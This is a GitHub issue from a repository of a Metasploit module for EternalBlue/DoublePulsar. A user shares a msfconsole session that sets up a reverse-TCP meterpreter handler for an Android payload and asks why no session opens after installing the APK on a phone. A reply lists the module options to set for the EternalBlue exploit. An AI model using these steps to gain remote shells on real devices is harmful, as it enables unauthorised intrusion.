Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks source link

[*] Exploit completed, but no session was created.___kali linux #105

Open AqeelTariq97 opened 3 years ago

AqeelTariq97 commented 3 years ago
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.*.**
LHOST => 10.**.*.**
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.0.*.**: 4444 
msf6 exploit(multi/handler) > 

I also install the apk file in phone but system is not able to get the device. i also use exploit instead of exploit -j but the problem is same. help me out solving this problem I am stuck.

Morsmalleo commented 3 years ago

Dont use multi handler, type into the msfconsole search eternalblue_doublepulsar it l should come up as 0 so just type use 0 then set the payload, Eternalbluepath, Doublepulsarpath, RHOSTS, winepath and the targetarchitecture